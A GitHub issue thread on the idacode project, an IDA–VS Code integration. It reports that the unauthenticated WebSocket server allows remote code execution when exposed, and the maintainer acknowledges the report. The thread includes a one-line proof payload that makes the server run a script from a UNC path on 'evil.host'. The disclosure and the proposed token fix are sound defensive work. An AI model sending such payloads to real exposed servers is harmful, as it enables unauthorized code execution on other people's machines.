search

ioncodes / idacode

An integration for IDA and VS Code which connects both to easily execute and debug IDAPython scripts.
725 stars 77 forks source link

Security concern on WebSocket #7

Open ChiChou opened 4 years ago

ChiChou commented 4 years ago

According to https://github.com/ioncodes/idacode/issues/5 remote host is planned to be supported. There is no authentication for the socket server yet. So an attacker may be able to communicate with the server and trigger a remote code execution:

ws.send(new Blob([JSON.stringify({event: 'execute_script', path: '\\\\evil.host\\calc.py'})]))

Luckily tornado has Origin validation by default, which means if the HOST is 127.0.0.1, the attacker can not talk to the backend from a web browser unless he's got a UXSS. But when using this utility for remote debugging (e.g., Host = '0.0.0.0'), it is possible for the attacker to spoof the Origin header and trigger a 0click rce.

Maybe adding a random token validation upon connection can avoid such problem

ioncodes commented 4 years ago

Thanks for opening up this issue. I will definitely track it along with #5. Exposing the server in this manner is at this stage discouraged (as mentioned by the README) but it's still an important feature and will find an implementation in the near future.